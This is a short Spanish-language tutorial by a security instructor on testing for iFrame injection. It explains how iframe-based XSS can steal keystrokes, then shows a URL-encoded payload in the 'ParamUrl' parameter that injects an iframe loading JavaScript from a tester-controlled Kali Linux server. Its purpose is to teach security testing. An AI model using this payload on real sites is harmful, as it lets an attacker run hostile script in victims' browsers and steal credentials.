Prueba de Inyección iFrame
Una marco en línea (inline frame) es utilizado para incrustar otro documento dentro del documento HTML actual. Es decir se puede utilizara para una página web HTML sea incrustada dentro de otra página web correspondiente a un sitio web. Esto permite la inclusión de contenido desde fuentes externas, como publicidad en páginas web. Una inyección iFrame XSS es un ataque común de Cross-Site Scripting, el cual combina JavaScript malicioso con un iframe el cual carga una página legítima con el propósito de robar datos de un usuario desprevenido.
Este ataque frecuentemente tiene éxito cuando se combina con ingeniería social. Un ejemplo de ataque XSS por inyección de iFrame consistiría cuando un atacante convence al usuario para navegue hacia una página web controlada por el atacante. A continuación la página del atacante carga JavaScript malicioso en un iframe HTML el cual apunta hacia un sitio legítimo. Una vez que el usuario introduce sus credenciales en el sitio legítimo dentro del iframe, el JavaScript malicioso roba las pulsaciones de teclado.
Al analizar la respuesta devuelta por la aplicación, se visualiza el parámetro de nombre “ParamUrl” define el valor “robots.txt”.
En el cuerpo de la respuesta se visualiza la utilización de la etiqueta iframe para mostrar el contenido del archivo “robots.txt”
Para descubrir la la vulnerabilidad se cambia el valor del parámetro de nombre “ParamUrl” a lo siguiente:
robots.txt&ParamWidth=250&ParamHeight=250%22%3E%3C/iframe%3E%3Ciframe%20src=%22http://192.168.0.80/j.html%22%3E
La dirección corresponde a un servidor web ejecutándose en Kali Linux. El archivo de nombre “j.html” contiene el codigo JavaScript a ejecutar.
Se ha identificado y explotado exitosamente una inyección iFrame.
Fuentes:
https://www.radware.com/cyberpedia/application-security/iframe-injection...
https://www.w3schools.com/tags/tag_iframe.ASP
Sobre el Autor
Alonso Eduardo Caballero Quezada - ReYDeS
Instructor y Consultor Independiente en Ciberseguridad
WhatsApp: https://wa.me/51949304030
Correo Electrónico: ReYDeS@gmail.com
Twitter: https://twitter.com/Alonso_ReYDeS
Youtube: https://www.youtube.com/c/AlonsoCaballero
LinkedIn: https://pe.linkedin.com/in/alonsocaballeroquezada/